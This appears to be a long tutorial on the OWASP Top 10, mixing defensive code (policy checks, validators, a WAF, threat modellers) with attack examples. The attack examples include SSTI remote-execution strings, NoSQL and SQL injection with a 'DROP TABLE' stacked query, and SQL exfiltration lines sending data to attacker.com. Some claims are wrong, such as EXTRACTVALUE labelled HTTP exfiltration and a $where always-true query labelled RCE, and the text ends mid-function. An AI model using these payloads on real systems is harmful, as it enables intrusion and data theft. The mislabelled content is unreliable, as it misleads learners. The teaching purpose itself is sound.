The OWASP Top 10 represents not just a checklist of vulnerabilities, but a fundamental shift in how we approach application security. From its inception in 2003 to the 2026 edition, the evolution reflects the changing attack surfaces—from simple SQL injection to complex business logic flaws and supply chain attacks. This comprehensive guide examines each vulnerability through multiple lenses: theoretical foundations, advanced detection methodologies, exploitation patterns, defensive architectures, and forensic investigation techniques.
Broken access control is the most severe and prevalent vulnerability class in modern applications, with some form of access control flaw found in 94% of applications tested. The fundamental issue stems from confusing authentication with authorization: systems verify "who you are" but fail to consistently check "what you're allowed to do."
Modern applications implement authorization at four distinct levels:
- User Interface (UI) Level: Hiding buttons/links from unauthorized users
- API/Endpoint Level: Server-side validation of requested resources
- Business Logic Level: Contextual permission checks
- Data/Object Level: Individual record access validation
Failures most commonly occur between levels 1 and 2 (the UI hides the control but the API still allows the action) and between levels 3 and 4 (the user holds the general permission but should not be able to reach the specific object).
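The gap between these levels is easiest to see in code. Below is a minimal sketch (illustrative names and in-memory data, no framework assumed) of a handler that passes the endpoint-level role check but omits the object-level ownership check, next to the corrected version:

# Minimal sketch of the level-3/level-4 gap; names and data are illustrative
from dataclasses import dataclass

@dataclass
class Invoice:
    id: int
    owner_id: int
    amount: float

INVOICES = {1: Invoice(1, owner_id=100, amount=250.0)}

def get_invoice_vulnerable(current_user_id: int, role: str, invoice_id: int) -> Invoice:
    # Level 3 check only: any authenticated user may call the endpoint ...
    if role not in ("user", "admin"):
        raise PermissionError("login required")
    # ... but nothing ties the requested record to the caller (level 4 missing)
    return INVOICES[invoice_id]

def get_invoice_safe(current_user_id: int, role: str, invoice_id: int) -> Invoice:
    invoice = INVOICES[invoice_id]
    # Object-level check: the caller must own the record or be an admin
    if role != "admin" and invoice.owner_id != current_user_id:
        raise PermissionError("not your invoice")
    return invoice

# User 200 can read user 100's invoice through the vulnerable handler:
print(get_invoice_vulnerable(200, "user", 1).amount)   # 250.0 (IDOR)
# The safe handler rejects the same request:
# get_invoice_safe(200, "user", 1) -> PermissionError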
GraphQL Authorization Bypasses
# Original query (requires authorization)
query {
user(id: "123") {
email
paymentMethods {
lastFour
}
}
}
# Attack: Query introspection to discover hidden fields
query {
__schema {
types {
name
fields {
name
type {
name
}
}
}
}
}
# Direct query to discovered admin-only fields
query {
adminUsers {
id
apiKeys
internalNotes
}
}

JWT Claim Manipulation Attacks
JSON Web Tokens with flawed validation enable sophisticated attacks:
- Algorithm Confusion: "alg": "none" or RS256 to HS256 switching
- Key ID Injection: Manipulating the kid header to point to an attacker-controlled key
- Claim Tampering: Modifying role, scope, or permissions claims
- Timing Attacks: Exploiting clock skew between token validation servers
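On the defensive side, most of these attacks fail when the verifier pins the expected algorithm and required claims instead of trusting the token header. A minimal sketch using PyJWT, with an illustrative HS256 secret purely for demonstration:

import jwt  # PyJWT

SECRET = "demo-secret"  # illustrative only

token = jwt.encode({"sub": "123", "role": "user"}, SECRET, algorithm="HS256")
forged = jwt.encode({"sub": "123", "role": "admin"}, key=None, algorithm="none")

print(jwt.decode(token, SECRET, algorithms=["HS256"]))  # accepted
try:
    # The allow-list comes from server configuration, never from the token header
    jwt.decode(forged, SECRET, algorithms=["HS256"])
except jwt.InvalidTokenError as exc:
    print("rejected:", exc)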
Mass Assignment Vulnerabilities
APIs that automatically bind request parameters to objects often enable privilege escalation:
POST /api/users/update-profile
Content-Type: application/json
{
"name": "Attacker",
"email": "attacker@evil.com",
"role": "admin", // Should not be settable by user
"isActive": true,
"balance": 999999
}

Horizontal Privilege Escalation Testing Matrix
- Parameter Manipulation
  - Numeric IDs: /api/user/456 → /api/user/457
  - UUIDs: Check for predictable patterns or leaked UUIDs
  - Usernames: /api/profile/attacker → /api/profile/victim
  - Email addresses: Common in password reset endpoints
- HTTP Method Testing
  - GET endpoints often have different authorization than POST/PUT/DELETE
  - Test every method on every endpoint:
    GET /api/admin/users → 403 Forbidden (expected)
    POST /api/admin/users → 201 Created (unexpected!)
- State-Based Authorization Testing
  - Document states and transitions
  - Test out-of-order transitions
  - Example: Purchase flow bypass
    Step 1: Add to cart → /cart/add
    Step 2: Enter shipping → /checkout/shipping
    Step 3: Payment → /checkout/payment
    Step 4: Confirm → /checkout/confirm
    Attack: Skip to /checkout/confirm without payment
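The matrix above translates directly into a simple probe script. A hedged sketch using the requests library, with hypothetical endpoints, IDs, and token; anything other than 403/404 deserves manual review:

import requests

BASE = "https://target.example.com"          # hypothetical target
session = requests.Session()
session.headers["Authorization"] = "Bearer <low-privilege-token>"

# Parameter manipulation: walk neighbouring numeric IDs as a low-privilege user
for object_id in range(450, 460):
    r = session.get(f"{BASE}/api/user/{object_id}", timeout=10)
    if r.status_code == 200:
        print(f"possible IDOR: /api/user/{object_id}")

# Method testing: the same path may authorize GET but not POST/PUT/DELETE
for method in ("GET", "POST", "PUT", "DELETE"):
    r = session.request(method, f"{BASE}/api/admin/users", timeout=10)
    print(method, r.status_code)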
Vertical Privilege Escalation via Role Inheritance
Modern RBAC systems with role inheritance create subtle vulnerabilities:
# Role hierarchy
admin:
- manage_users
- view_audit_logs
moderator:
- manage_content
- view_reports
user:
- create_content
- view_content
# Vulnerability: Admin inherits user permissions
# Attack: Find user-only endpoints, access with admin token
# Some endpoints may only check "isAdmin", not "hasPermission"

# Advanced ABAC implementation
class AccessPolicy:
def evaluate(self, user, resource, action, context):
# Multi-dimensional evaluation
rules = [
# Time-based restrictions
TimeRule("09:00-17:00", "business_hours_only"),
# Location-based restrictions
IPRule(allowed_networks=["10.0.0.0/8"]),
# Resource-specific rules
ResourceOwnerRule(user, resource),
# Custom business logic
lambda u, r, a, c: (
r.sensitivity == "high" and
u.clearance >= "confidential"
),
# Rate limiting integration
RateLimitRule(action, user, limit="100/hour"),
]
        return all(
            rule(user, resource, action, context) if callable(rule)
            else rule.evaluate(user, resource, action, context)
            for rule in rules
        )  # plain callables and rule objects are both supported

// Centralized policy enforcement
@RestController
public class UserController {
@Autowired
private PolicyDecisionPoint pdp;
@GetMapping("/users/{userId}/documents/{docId}")
public Document getDocument(@PathVariable String userId,
@PathVariable String docId) {
// Query PDP with full context
AuthorizationContext context = AuthorizationContext.builder()
.subject(SecurityContext.getUser())
.resource(new DocumentResource(docId))
.action("read")
.environment(EnvContext.getCurrent())
.build();
if (!pdp.isAuthorized(context)) {
throw new AccessDeniedException();
}
return documentService.getDocument(docId);
}
}

Log Analysis for Authorization Failures
-- Detect suspicious access patterns
SELECT
user_id,
COUNT(DISTINCT accessed_resource) as unique_resources,
COUNT(CASE WHEN status_code = 403 THEN 1 END) as denied_attempts,
COUNT(CASE WHEN status_code = 200 THEN 1 END) as successful_accesses,
MIN(timestamp) as first_attempt,
MAX(timestamp) as last_attempt
FROM access_logs
WHERE timestamp > NOW() - INTERVAL '1 hour'
GROUP BY user_id
HAVING
denied_attempts > 10 OR
unique_resources > 100 OR
(successful_accesses / NULLIF(denied_attempts, 0)) < 0.1 -- High failure rate
ORDER BY denied_attempts DESC;

- Quantum Computing Threats
  - RSA-2048: Vulnerable to Shor's algorithm (theoretical)
  - ECC-256: Similarly vulnerable
  - AES-256: Still considered secure; Grover's algorithm only halves the effective key strength
- Side-Channel Attacks (see the constant-time comparison sketch after this list)
  - Timing attacks on string comparison
  - Power analysis on hardware security modules
  - Cache timing attacks (Spectre/Meltdown variants)
  - Acoustic cryptanalysis
- Cryptographic Agility Failures
  - Hardcoded algorithms with no migration path
  - Lack of protocol negotiation mechanisms
  - Version pinning attacks
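For the timing-attack entry, the standard mitigation is a constant-time comparison. A minimal sketch using Python's hmac module:

import hmac

def check_api_key(presented: str, expected: str) -> bool:
    # A plain == short-circuits at the first differing byte, leaking how much
    # of the secret matched through response timing; compare_digest does not.
    return hmac.compare_digest(presented.encode(), expected.encode())

print(check_api_key("guess-000000", "secret-token"))  # False, in constant time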
TLS/SSL Deep Inspection
# Comprehensive TLS testing with testssl.sh
testssl.sh --parallel --html --json --logfile audit.html \
--server-preference --protocols --ciphers \
--vulnerabilities --headers https://target.com
# Check for specific vulnerabilities
openssl s_client -connect target.com:443 -tls1_2 \
-cipher 'ECDHE-RSA-AES128-GCM-SHA256' \
-servername target.com | openssl x509 -text
# Automated misconfiguration detection
sslscan --show-certificate --show-ciphers --show-sigalgs \
--show-curves --no-failed target.com:443

Storage Encryption Assessment Matrix
| Storage Type | Common Flaws | Detection Method |
|---|---|---|
| Database Fields | ECB mode, same IV, no authentication | Analyze ciphertext patterns, identical values |
| File System | Weak keys, key storage in config files | Strings analysis, configuration review |
| Backup Files | No encryption, hardcoded passwords | Backup process analysis, restore testing |
| Memory | Plaintext secrets in memory dumps | Process memory analysis with volatility |
| Cloud Storage | Public buckets, weak IAM policies | Bucket enumeration, policy analysis |
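The "analyze ciphertext patterns" detection for database fields can be automated: ECB mode encrypts identical plaintext blocks to identical ciphertext blocks, so repeated 16-byte blocks are a strong indicator. A small illustrative check:

from collections import Counter

def ecb_indicator(ciphertext: bytes, block_size: int = 16) -> int:
    # Split into cipher blocks and count how many appear more than once;
    # repeats across a large ciphertext strongly suggest ECB (or IV reuse).
    blocks = [ciphertext[i:i + block_size]
              for i in range(0, len(ciphertext), block_size)]
    return sum(count for count in Counter(blocks).values() if count > 1)

# Example: a value with an obviously repeated block trips the check
sample = bytes(range(16)) * 3 + bytes(16)
print(ecb_indicator(sample))  # the same block appears 3 times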
Key Management Anti-Patterns
# BAD: Hardcoded keys
SECRET_KEY = "my-super-secret-key-12345" # In source code
# BAD: Key in environment variable (visible in errors)
import os
key = os.environ.get("ENCRYPTION_KEY") # Leaks in stack traces
# BAD: Weak key derivation
from hashlib import sha256
key = sha256(b"password").digest() # No salt, no iterations
# GOOD: Hardware-backed key management (envelope encryption via AWS KMS)
import base64
import boto3
from cryptography.fernet import Fernet

kms = boto3.client('kms')
response = kms.generate_data_key(
    KeyId='alias/encryption-key',
    KeySpec='AES_256'
)
# Use the KMS-generated data key locally; persist only the encrypted copy
# (response['CiphertextBlob']) alongside the data it protects
cipher = Fernet(base64.urlsafe_b64encode(response['Plaintext']))

Advanced Hash Function Vulnerabilities
- Length Extension Attacks (see the HMAC sketch after this list)

  # Vulnerable: SHA-256 without HMAC
  hash = sha256(secret + message)
  # Attack: append data without knowing the secret
  # Attacker can compute hash(secret || message || padding || appended_data)
- Algorithm Confusion in JWT

  # Server expects RS256 (asymmetric)
  header = {"alg": "RS256", "typ": "JWT"}
  # Attack: change to HS256 (symmetric)
  header = {"alg": "HS256", "typ": "JWT"}
  # Then use the server's public key as the HMAC secret
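The fix for the length-extension case is a keyed MAC rather than a bare hash of secret-plus-message. A short sketch (illustrative secret and message) contrasting the two constructions:

import hashlib, hmac

secret = b"server-side-secret"          # illustrative value
message = b"user=alice&role=user"

weak_tag = hashlib.sha256(secret + message).hexdigest()              # extendable
strong_tag = hmac.new(secret, message, hashlib.sha256).hexdigest()   # not extendable

def verify(msg: bytes, tag: str) -> bool:
    expected = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)

print(verify(message, strong_tag))  # True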
public class CryptographyManager {
private Map<String, CryptoProvider> providers;
private KeyRotationSchedule rotationSchedule;
public EncryptedData encrypt(String algorithm, byte[] data) {
CryptoProvider provider = providers.get(algorithm);
// Check if algorithm is deprecated
if (rotationSchedule.isDeprecated(algorithm)) {
// Auto-rotate to new algorithm
algorithm = rotationSchedule.getCurrentAlgorithm();
provider = providers.get(algorithm);
// Re-encrypt old data in background
scheduleReEncryption(algorithm);
}
// Generate metadata for future migration
CryptoMetadata metadata = CryptoMetadata.builder()
.algorithm(algorithm)
.keyVersion(provider.getKeyVersion())
.timestamp(Instant.now())
.iv(provider.generateIV())
.build();
byte[] ciphertext = provider.encrypt(data);
return new EncryptedData(ciphertext, metadata);
}
public byte[] decrypt(EncryptedData encryptedData) {
CryptoMetadata metadata = encryptedData.getMetadata();
// Support multiple algorithm versions
CryptoProvider provider = providers.getOrDefault(
metadata.getAlgorithm(),
getFallbackProvider(metadata)
);
return provider.decrypt(
encryptedData.getCiphertext(),
metadata
);
}
}

# Post-quantum cryptography with hybrid approach
from cryptography.hazmat.primitives.asymmetric import ec, rsa
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from pqcrypto.kem.kyber1024 import generate_keypair, encrypt, decrypt
from Crypto.Cipher import AES  # pycryptodome, used for AES-GCM below
import os
class HybridEncryption:
def __init__(self):
# Traditional cryptography (current protection)
self.ec_key = ec.generate_private_key(ec.SECP384R1())
# Post-quantum cryptography (future protection)
self.pq_public_key, self.pq_private_key = generate_keypair()
def encrypt_hybrid(self, plaintext: bytes) -> HybridCiphertext:
# Generate ephemeral key pair
ephemeral_ec = ec.generate_private_key(ec.SECP384R1())
# Perform two key exchanges
# 1. ECDH key exchange
ecdh_shared = ephemeral_ec.exchange(
ec.ECDH(),
self.ec_key.public_key()
)
# 2. Kyber key encapsulation
pq_ciphertext, pq_shared = encrypt(self.pq_public_key)
# Combine both shared secrets
combined_secret = HKDF(
algorithm=hashes.SHA512(),
length=64,
salt=None,
info=b'hybrid-kem'
).derive(ecdh_shared + pq_shared)
# Use first 32 bytes for AES key, next 32 for HMAC
aes_key = combined_secret[:32]
hmac_key = combined_secret[32:]
# Encrypt with AES-GCM
iv = os.urandom(12)
cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
ciphertext, tag = cipher.encrypt_and_digest(plaintext)
return HybridCiphertext(
ephemeral_pubkey=ephemeral_ec.public_key(),
pq_ciphertext=pq_ciphertext,
iv=iv,
ciphertext=ciphertext,
tag=tag,
            # Note: the derived hmac_key stays server-side; it must not ship with the ciphertext
        )

Memory Analysis for Key Recovery
import re
import volatility.plugins as plugins
import volatility.utils as utils

class KeyRecoveryPlugin(plugins.Plugin):
def calculate(self):
# Scan process memory for key patterns
addr_space = utils.load_as(self._config)
# Common key patterns
patterns = [
b'AES', b'RSA', b'BEGIN.*PRIVATE KEY',
b'[0-9a-f]{64}', # 32-byte hex key
b'[A-Za-z0-9+/=]{44}', # Base64 encoded 32-byte key
]
for proc in self.list_processes():
proc_space = proc.get_process_address_space()
for vad in proc.VADs:
try:
data = proc_space.zread(vad.Start, vad.Length)
for pattern in patterns:
matches = re.finditer(pattern, data)
for match in matches:
# Extract potential key material
context = self.extract_context(
data, match.start(), 512
)
yield (proc, vad, match, context)
                    except Exception:
                        continue

NoSQL Injection Evolution
// MongoDB injection examples
// Classic injection
db.users.find({
username: req.body.username,
password: req.body.password
});
// Attack: $ne operator
{
"username": {"$ne": ""},
"password": {"$ne": ""}
}
// JavaScript injection via $where
db.users.find({
$where: `function() {
return this.username == '${req.body.username}' &&
this.password == '${req.body.password}'
}`
});
// Attack: RCE via $where
{
"$where": "function() { return true; }"
}

Template Injection (SSTI) Matrix
| Template Engine | Payload | Impact |
|---|---|---|
| Jinja2 | {{config}} {{''.__class__}} | Information disclosure, RCE |
| Freemarker | <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} | RCE |
| Velocity | #set($x=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id")) | RCE |
| Thymeleaf | __${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x | RCE |
| Handlebars | Limited by design | Context escape only |
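For the Jinja2 row, the core mitigation is keeping user input out of the template source entirely; Jinja2's SandboxedEnvironment adds a second layer when user-authored templates are unavoidable. A hedged sketch:

from jinja2.sandbox import SandboxedEnvironment

env = SandboxedEnvironment(autoescape=True)
user_supplied_value = "{{ ''.__class__.__mro__ }}"   # attacker-style payload

# Safe: the payload is passed as data, so it renders literally
print(env.from_string("Hello {{ name }}").render(name=user_supplied_value))

# Unsafe pattern: building the template string from user input. The sandbox
# blocks underscore attributes such as __class__, but treating input as
# template code remains fragile and should be avoided.
# env.from_string("Hello " + user_supplied_value).render()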
Advanced SQL Injection Techniques
Time-Based Blind SQLi with Conditional Branching
-- Traditional time-based
SELECT IF(1=1, SLEEP(5), 0)
-- Advanced: Conditional errors for faster extraction
SELECT CASE
WHEN SUBSTRING(database(),1,1)='a'
THEN 1/0
ELSE 1
END
-- Stacked queries exploitation (when allowed)
SELECT * FROM users; DROP TABLE logs; --

Out-of-Band Data Exfiltration
-- DNS exfiltration
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\test'))
-- HTTP exfiltration via XMLHTTP
SELECT EXTRACTVALUE(1, CONCAT(0x3a, (SELECT password FROM users LIMIT 1)))
-- SMB capture
SELECT * INTO OUTFILE '\\\\attacker\\share\\data.txt'

Context-Aware Input Validation Framework
import re

class InputValidator:
VALIDATION_CONTEXTS = {
'sql_identifier': r'^[a-zA-Z_][a-zA-Z0-9_]*$',
'sql_literal': {
'string': lambda x: re.match(r"^[^'\\]*(?:\\.[^'\\]*)*$", x),
'numeric': lambda x: x.isdigit(),
'boolean': lambda x: x in ('TRUE', 'FALSE', '1', '0')
},
'html_safe': {
'text': HTML_ESCAPE_REGEX,
'attribute': ATTRIBUTE_ESCAPE_REGEX,
'url': URL_VALIDATION_REGEX
},
'os_command': {
'filename': FILENAME_REGEX,
'path': SAFE_PATH_REGEX,
'argument': SAFE_ARGUMENT_REGEX
}
}
def validate(self, input_data, context, constraints=None):
"""
Advanced validation with context awareness
"""
# Step 1: Identify context
validation_rules = self.VALIDATION_CONTEXTS.get(context)
if not validation_rules:
raise ValueError(f"Unknown context: {context}")
# Step 2: Apply grammar-based validation
if isinstance(validation_rules, dict):
# Complex context with sub-contexts
subcontext = self.detect_subcontext(input_data)
rule = validation_rules.get(subcontext)
else:
rule = validation_rules
# Step 3: Validate
if callable(rule):
return rule(input_data)
elif isinstance(rule, str):
return bool(re.match(rule, input_data))
# Step 4: Apply constraints
if constraints:
return self.apply_constraints(input_data, constraints)
return True
def detect_subcontext(self, input_data):
"""
Heuristic detection of input sub-context
"""
# Analyze input characteristics
if input_data.startswith(('http://', 'https://')):
return 'url'
elif '/' in input_data or '\\' in input_data:
return 'path'
elif any(c in input_data for c in ['<', '>', '"', "'"]):
return 'html'
else:
            return 'text'

AST-Based SQL Injection Detection
import sqlparse
from sqlparse.sql import Comparison, Identifier, Parenthesis
class SQLInjectionDetector:
def analyze_query(self, query: str, params: dict) -> RiskAssessment:
"""
Parse SQL and analyze for injection patterns
"""
parsed = sqlparse.parse(query)
findings = []
for statement in parsed:
# Check for tautologies
findings.extend(self.detect_tautologies(statement))
# Check for stacked queries
findings.extend(self.detect_stacked_queries(statement))
# Check for union attacks
findings.extend(self.detect_union_attacks(statement))
# Check for blind injection patterns
findings.extend(self.detect_blind_patterns(statement))
# Check parameter usage
findings.extend(self.analyze_parameter_usage(statement, params))
return RiskAssessment(
query=query,
findings=findings,
risk_level=self.calculate_risk_level(findings)
)
def detect_tautologies(self, statement):
"""
Detect always-true conditions
"""
tautologies = []
# Find WHERE clauses
where_tokens = self.find_tokens(statement, 'WHERE')
for where in where_tokens:
# Look for comparisons
comparisons = where.tokens[1].tokens
for token in comparisons:
                if isinstance(token, Comparison):
                    # Comparison exposes .left and .right; check for 1=1, 'a'='a', etc.
                    if self.is_tautology(token.left, token.right):
tautologies.append({
'type': 'tautology',
'location': token.pos,
'pattern': str(token)
})
        return tautologies

Safe Query Builder with DSL
from typing import Any, Generic, List, Protocol, Tuple, Type, TypeVar
from dataclasses import dataclass
T = TypeVar('T')
class SafeQueryBuilder(Generic[T]):
def __init__(self, model: Type[T]):
self.model = model
self._conditions = []
self._params = {}
self._param_counter = 0
def where(self, condition: 'Condition') -> 'SafeQueryBuilder':
"""
Type-safe where condition builder
"""
param_name = f"p{self._param_counter}"
self._param_counter += 1
# Generate safe SQL with parameter placeholder
sql, value = condition.to_sql(param_name)
self._conditions.append(sql)
self._params[param_name] = value
return self
def build(self) -> Tuple[str, dict]:
"""
Build safe parameterized query
"""
query = f"SELECT * FROM {self.model._table_name}"
if self._conditions:
query += " WHERE " + " AND ".join(self._conditions)
return query, self._params
class Condition(Protocol):
def to_sql(self, param_name: str) -> Tuple[str, Any]:
...
@dataclass
class Equals:
column: str
value: Any
def to_sql(self, param_name: str):
return f"{self.column} = :{param_name}", self.value
@dataclass
class In:
column: str
values: List[Any]
def to_sql(self, param_name: str):
placeholders = [f":{param_name}_{i}"
for i in range(len(self.values))]
sql = f"{self.column} IN ({', '.join(placeholders)})"
params = {f"{param_name}_{i}": value
for i, value in enumerate(self.values)}
return sql, params
# Usage
query_builder = SafeQueryBuilder(User) \
.where(Equals("username", "admin")) \
.where(In("status", ["active", "pending"]))
sql, params = query_builder.build()
# SELECT * FROM users WHERE username = :p0 AND status IN (:p1_0, :p1_1)

Context-Aware Escaping System
class ContextAwareEscaper:
ESCAPE_FUNCTIONS = {
'html_text': html.escape,
        'html_attribute': lambda x: x.replace('"', '&quot;'),
'javascript_string': json.dumps,
'css_value': cssutils.serialize,
'sql_identifier': lambda x: f'`{x.replace("`", "``")}`',
        'sql_literal_string': lambda x: "'" + x.replace("'", "''") + "'",
'os_argument': shlex.quote,
'ldap_filter': ldap.filter.escape_filter_chars,
'xpath': xpath.escape,
}
CONTEXT_DETECTION_RULES = [
(r'^SELECT.*WHERE.*=.*$', 'sql_literal'),
(r'^<[^>]+>.*</[^>]+>$', 'html_text'),
(r'^onclick=".*"$', 'javascript_string'),
(r'^background: url\(.*\)$', 'css_value'),
]
def escape(self, data: str, context: str = None) -> str:
"""
Escape data based on context or auto-detect
"""
if context is None:
context = self.detect_context(data)
escape_func = self.ESCAPE_FUNCTIONS.get(context)
if escape_func is None:
raise ValueError(f"No escape function for context: {context}")
return escape_func(data)
def detect_context(self, data: str) -> str:
"""
Heuristically detect the most likely context
"""
for pattern, context in self.CONTEXT_DETECTION_RULES:
if re.search(pattern, data, re.IGNORECASE | re.DOTALL):
return context
# Default to HTML text for web applications
        return 'html_text'

Web Application Firewall with Behavioral Analysis
class BehavioralWAF:
def __init__(self):
self.request_baselines = {}
self.injection_patterns = self.load_patterns()
self.ml_model = self.load_ml_model()
def analyze_request(self, request: HttpRequest) -> ThreatScore:
"""
Multi-layered injection detection
"""
score = 0
# Layer 1: Pattern matching
pattern_score = self.pattern_matching(request)
score += pattern_score
# Layer 2: Behavioral analysis
behavioral_score = self.behavioral_analysis(request)
score += behavioral_score
# Layer 3: Machine learning
ml_score = self.ml_analysis(request)
score += ml_score
# Layer 4: Context-aware analysis
context_score = self.context_analysis(request)
score += context_score
return ThreatScore(
total=score,
components={
'pattern': pattern_score,
'behavioral': behavioral_score,
'ml': ml_score,
'context': context_score
}
)
def behavioral_analysis(self, request):
"""
Analyze request behavior against baseline
"""
client_id = self.get_client_id(request)
baseline = self.request_baselines.get(client_id, {})
anomalies = []
# Check parameter count anomalies
expected_params = baseline.get('param_count', {})
current_params = len(request.params)
if abs(current_params - expected_params.get('mean', 0)) > 3 * expected_params.get('std', 0):
anomalies.append('parameter_count_anomaly')
# Check value length anomalies
for param, value in request.params.items():
baseline_len = baseline.get('param_lengths', {}).get(param, {})
if baseline_len:
expected_mean = baseline_len.get('mean', 0)
expected_std = baseline_len.get('std', 1)
if abs(len(value) - expected_mean) > 3 * expected_std:
anomalies.append(f'length_anomaly_{param}')
# Check character distribution
for param, value in request.params.items():
char_dist = self.character_distribution(value)
baseline_dist = baseline.get('char_dist', {}).get(param, {})
if baseline_dist:
divergence = self.kl_divergence(char_dist, baseline_dist)
if divergence > 1.0: # Threshold
anomalies.append(f'distribution_anomaly_{param}')
        return len(anomalies) * 10  # Score based on anomaly count

Threat Modeling Methodologies
- STRIDE Per Element
  - Spoofing: Authentication mechanisms per component
  - Tampering: Data integrity controls per data flow
  - Repudiation: Logging and auditing per transaction
  - Information Disclosure: Encryption and access controls
  - Denial of Service: Availability and resilience design
  - Elevation of Privilege: Authorization architecture
- DREAD Risk Assessment (see the scoring sketch after this list)
  - Damage Potential: 0-10
  - Reproducibility: 0-10
  - Exploitability: 0-10
  - Affected Users: 0-10
  - Discoverability: 0-10
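DREAD scores are usually combined by averaging the five factors. A minimal sketch; the risk banding used in the comment is illustrative, not part of the methodology:

from dataclasses import dataclass

@dataclass
class DreadScore:
    damage: int
    reproducibility: int
    exploitability: int
    affected_users: int
    discoverability: int

    @property
    def risk(self) -> float:
        # Conventional DREAD aggregation: average of the five 0-10 ratings
        return (self.damage + self.reproducibility + self.exploitability
                + self.affected_users + self.discoverability) / 5

score = DreadScore(damage=8, reproducibility=9, exploitability=6,
                   affected_users=7, discoverability=5)
print(score.risk)  # 7.0 -> "High" under an illustrative 0-3 / 4-6 / 7-10 banding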
Business Logic Attack Taxonomy
| Attack Category | Example | Impact |
|---|---|---|
| Workflow Bypass | Skip payment step | Financial loss |
| Race Conditions | Double-spend attack | Resource exhaustion |
| State Manipulation | Change order status | Unauthorized access |
| Parameter Tampering | Negative price | Financial loss |
| Time-Based Attacks | Expired session reuse | Session hijacking |
Business Logic Testing Framework
class BusinessLogicTester:
def __init__(self, application_model):
self.model = application_model
self.state_machine = self.build_state_machine()
self.test_cases = self.generate_test_cases()
def build_state_machine(self):
"""
Build finite state machine from application model
"""
states = {}
transitions = {}
# Parse API endpoints and workflows
for endpoint in self.model.endpoints:
from_state = endpoint.required_state
to_state = endpoint.result_state
if from_state not in transitions:
transitions[from_state] = []
transitions[from_state].append({
'action': endpoint.action,
'to_state': to_state,
'constraints': endpoint.constraints
})
return {
'states': states,
'transitions': transitions,
'initial_state': 'start',
'final_states': ['complete', 'canceled', 'failed']
}
def generate_test_cases(self):
"""
Generate business logic test cases
"""
test_cases = []
# 1. State bypass tests
for target_state in self.state_machine['final_states']:
test_cases.extend(
self.generate_state_bypass_tests(target_state)
)
# 2. Race condition tests
test_cases.extend(self.generate_race_condition_tests())
# 3. Parameter manipulation tests
test_cases.extend(self.generate_parameter_tests())
# 4. Workflow manipulation tests
test_cases.extend(self.generate_workflow_tests())
return test_cases
def generate_state_bypass_tests(self, target_state):
"""
Generate tests that try to reach target state without proper sequence
"""
tests = []
# Find all paths to target state
paths = self.find_all_paths(
self.state_machine['initial_state'],
target_state
)
# Generate bypass attempts
for path in paths:
# Try skipping each step
for i in range(len(path)):
bypass_path = path[:i] + path[i+1:]
test = {
'type': 'state_bypass',
'path': bypass_path,
'expected': 'should_fail',
'description': f'Bypass step {i} to reach {target_state}'
}
tests.append(test)
return tests
def generate_race_condition_tests(self):
"""
Generate race condition test scenarios
"""
tests = []
# Identify non-idempotent operations
non_idempotent_endpoints = [
ep for ep in self.model.endpoints
if not ep.idempotent
]
for endpoint in non_idempotent_endpoints:
# Test parallel execution
test = {
'type': 'race_condition',
'endpoint': endpoint,
'concurrent_requests': 10,
'delay_between': '0ms',
'expected': 'consistent_state',
'description': f'Race condition on {endpoint.name}'
}
tests.append(test)
        return tests

Automated Threat Modeling
class AutomatedThreatModeler:
def __init__(self, architecture_diagram):
self.diagram = architecture_diagram
self.components = self.extract_components()
self.data_flows = self.extract_data_flows()
self.trust_boundaries = self.extract_trust_boundaries()
def analyze(self):
"""
Perform comprehensive threat analysis
"""
threats = []
# Analyze each component
for component in self.components:
threats.extend(self.analyze_component(component))
# Analyze data flows
for flow in self.data_flows:
threats.extend(self.analyze_data_flow(flow))
# Analyze trust boundaries
for boundary in self.trust_boundaries:
threats.extend(self.analyze_trust_boundary(boundary))
return self.prioritize_threats(threats)
def analyze_component(self, component):
"""
STRIDE analysis per component
"""
threats = []
# Spoofing threats
if component.has_authentication:
threats.append({
'component': component.name,
'threat': 'Spoofing',
'description': f'Authentication bypass on {component.name}',
'mitigation': 'Multi-factor authentication, strong session management'
})
# Tampering threats
if component.processes_sensitive_data:
threats.append({
'component': component.name,
'threat': 'Tampering',
'description': f'Data tampering on {component.name}',
'mitigation': 'Digital signatures, hash verification'
})
# Information Disclosure
if component.stores_secrets:
threats.append({
'component': component.name,
'threat': 'Information Disclosure',
'description': f'Secret leakage from {component.name}',
'mitigation': 'Encryption at rest, proper key management'
})
return threats
def analyze_data_flow(self, flow):
"""
Analyze threats in data flows
"""
threats = []
# Check encryption in transit
if not flow.encrypted:
threats.append({
'flow': f'{flow.source} -> {flow.destination}',
'threat': 'Information Disclosure',
'description': 'Data transmitted in cleartext',
'severity': 'High',
'mitigation': 'Enable TLS 1.2+ with strong ciphers'
})
# Check authentication
if flow.crosses_trust_boundary and not flow.authenticated:
threats.append({
'flow': f'{flow.source} -> {flow.destination}',
'threat': 'Spoofing',
'description': 'Unauthenticated cross-boundary communication',
'severity': 'High',
'mitigation': 'Mutual TLS, API tokens, or client certificates'
})
        return threats

Anti-Fraud Pattern Implementation
class FraudDetectionSystem:
def __init__(self):
self.rules_engine = RulesEngine()
self.ml_engine = MLEngine()
self.behavior_baselines = {}
self.shared_intelligence = ThreatIntelligenceFeed()
def evaluate_transaction(self, transaction):
"""
Multi-layered fraud detection
"""
risk_score = 0
# Layer 1: Rule-based detection
rule_violations = self.rules_engine.evaluate(transaction)
risk_score += len(rule_violations) * 10
# Layer 2: ML-based anomaly detection
ml_score = self.ml_engine.predict(transaction)
risk_score += ml_score
# Layer 3: Behavioral analysis
behavioral_score = self.analyze_behavior(transaction)
risk_score += behavioral_score
# Layer 4: Threat intelligence
intel_score = self.check_threat_intelligence(transaction)
risk_score += intel_score
# Layer 5: Velocity checking
velocity_score = self.check_velocity(transaction)
risk_score += velocity_score
        # Decision making: check the stricter threshold first
        if risk_score > 200:
            return self.block_transaction(transaction)
        elif risk_score > 100:
            return self.challenge_transaction(transaction)
        else:
            return self.allow_transaction(transaction)
def analyze_behavior(self, transaction):
"""
Behavioral fingerprint analysis
"""
user_id = transaction.user_id
# Get or create baseline
baseline = self.behavior_baselines.get(user_id)
if not baseline:
baseline = self.create_baseline(user_id)
self.behavior_baselines[user_id] = baseline
# Calculate behavioral deviation
deviations = []
